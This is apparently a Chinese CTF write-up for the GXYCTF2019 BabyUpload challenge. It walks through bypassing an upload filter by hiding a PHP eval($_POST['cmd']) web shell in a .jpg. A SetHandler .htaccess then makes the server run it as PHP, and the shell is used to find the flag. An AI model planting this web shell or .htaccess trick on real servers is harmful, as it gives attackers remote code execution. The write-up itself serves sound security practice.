[GXYCTF2019]BabyUpload-BUUTF

  • 开发
  • 27

题:

步骤(先上传木马,在上传.htaccess)

准备工作

他过滤了<? ,ph等

准备:一句话木马,.htaccess文件

.htaccess 

SetHandler application/x-httpd-php //解析为php文件
muma1.jpg

<script language='php'>eval($_POST['cmd']);</script>     //一句话木马

开始就绪

第一步:上传muma1.jpg再使用bp开始抓包,然后放过,得到他的路径

/var/www/html/upload/415d207cd4fbdc76b7a5d56818451ba3/muma1.jpg succesfully uploaded!

第二步:上传.htaccess通过pb抓包修改Content-Type: image/jpeg,再次放过,得到他的路径

/var/www/html/upload/415d207cd4fbdc76b7a5d56818451ba3/.htaccess succesfully uploaded!

第三步:组合得到的路径,进行蚁剑连接

nullicon-default.png?t=N7T8http://aa15f862-d40e-4a4c-8d64-f4b96a2547f6.node5.buuoj.cn:81/upload/415d207cd4fbdc76b7a5d56818451ba3/muma1.jpg

第四步:查找flag

方法一,可以直接搜索\flag

方法二,点击第一个\文件夹,直接拉到最下面,有一个flag文件,点开即可

阅读全部

相关推荐

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-04-24 20:06:01       94 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-04-24 20:06:01       100 阅读

  9. 在Django里面运行非项目文件

    2024-04-24 20:06:01       82 阅读

  19. Python语言-面向对象

    2024-04-24 20:06:01       91 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-04-24 20:06:01       85 阅读

热门阅读

  1. Hive数据库字符串脱敏函数mask使用方法

    2024-04-24 20:06:01       33 阅读

  2. Nginx介绍

    2024-04-24 20:06:01       35 阅读

  4. 「笔试刷题」:杨辉三角

    2024-04-24 20:06:01       36 阅读

  5. vue中多个.vue文件中style里定义同一个class的样式 会相互覆盖吗?

    2024-04-24 20:06:01       30 阅读

  8. 单片机通用程序~汇总目录

    2024-04-24 20:06:01       29 阅读

  11. Spring从零开始学使用系列(二)--控制反转(IoC),Spring容器与国际化

    2024-04-24 20:06:01       24 阅读

  17. 如何处理PHP中的文件上传和下载?

    2024-04-24 20:06:01       32 阅读

  25. Ubuntu20.04搭建gem5并运行helloworld

    2024-04-24 20:06:01       35 阅读

  28. SpringBoot项目 nohup启动运行日志过大问题

    2024-04-24 20:06:01       37 阅读

  29. 云主机是云服务器吗?

    2024-04-24 20:06:01       35 阅读

  30. react经验14:动态修改第三方组件的样式

    2024-04-24 20:06:01       29 阅读